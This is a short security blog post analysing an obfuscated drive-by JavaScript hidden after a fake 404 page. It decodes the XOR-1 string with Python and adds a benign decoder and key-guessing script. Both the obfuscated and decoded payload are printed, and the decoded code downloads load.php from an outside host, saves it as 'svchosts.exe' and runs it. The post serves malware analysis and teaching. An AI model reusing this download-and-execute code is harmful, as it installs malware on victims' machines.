:wq - blog » deobfuscation
http://writequit.org/blog

Quick javascript de-obfuscation with python
http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/
Thu, 05 Jun 2008 22:44:59 +0000

Scholar was kind enough to allow me to post his/her obfuscated javascript. Here's a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

(line breaks in the str variable were added so it's actually readable). Looks like this script uses the same XOR method as the script I posted about previously: every character code is XORed with 1 and the result is handed to eval. This script is actually trivial to de-obfuscate using python (I <3 ruby, but ruby interpolates #{} inside double-quoted strings, and the obfuscated string contains those, so it was easier just to use python instead):

shell> python
>>> str = <long-string-from-above-pasted-here>
>>> str2 = ""
>>> for i in range(len(str)):
...     # XOR the character code, then convert back to a character
...     str2 = str2 + chr(ord(str[i]) ^ 1)
...

str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.
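The decoding loop above is the whole trick, so here is a small stand-alone version of it. This is an added example, not the post's code or the obfuscated script itself: the SAMPLE string is a constructed, harmless snippet obfuscated with the same XOR-1 scheme, DECODER_LOOP is the decoder statement copied from the script above, and the scoring heuristic and function names are my own. It goes a step beyond the post by also brute-forcing the single-byte key and by pulling the key out of the decoder loop, which is handy when the next sample uses something other than ^ 1.

```python
import re
import string

# Constructed sample: "var t = document.title; alert(t);" with every character
# code XORed with 1, the same scheme the script in the post uses.
SAMPLE = "w`s!u!<!enbtldou/uhumd:!`mdsu)u(:"

# The decoder statement as it appears in the obfuscated page above.
DECODER_LOOP = ("for (i = 0; i < str.length; i ++) { str2 =  str2 + "
                "String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);")

# Tokens most real JavaScript contains; used only to rank candidate keys
# (assumed heuristic, not something the post describes).
JS_TOKENS = ("function", "var ", "document", "eval(", "(", ");")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def xor_decode(obfuscated, key):
    """The post's loop as a function: XOR each char code with a single-byte key."""
    return "".join(chr(ord(c) ^ key) for c in obfuscated)


def score_plaintext(candidate):
    """Higher is more JavaScript-like: printable chars rewarded, control chars penalised,
    a bonus for each known token found."""
    printable = sum(1 for c in candidate if c in PRINTABLE)
    unprintable = len(candidate) - printable
    tokens = sum(20 for tok in JS_TOKENS if tok in candidate)
    return printable - 10 * unprintable + tokens


def guess_key(obfuscated, keys=range(256)):
    """Try every single-byte key and return (key, decoded) for the best-scoring one.
    Useful when the decoder loop is not available and only the string was captured."""
    best = max(keys, key=lambda k: score_plaintext(xor_decode(obfuscated, k)))
    return best, xor_decode(obfuscated, best)


def extract_xor_key(script_source):
    """Pull the constant after 'charCodeAt(i) ^' out of a decoder loop like the post's.
    Returns None if no such pattern is present."""
    m = re.search(r"charCodeAt\s*\(\s*\w+\s*\)\s*\^\s*(\d+)", script_source)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    key = extract_xor_key(DECODER_LOOP)
    print("key from decoder loop:", key)
    print("decoded with that key:", xor_decode(SAMPLE, key))
    guessed, plain = guess_key(SAMPLE)
    print("brute-forced key:", guessed, "->", plain)
```

Because XOR with a fixed key is its own inverse, xor_decode also re-obfuscates, which makes it easy to build further test strings for the scorer. Printing the recovered script instead of eval'ing it is the point: the decoded text is read, never executed.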

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader :)
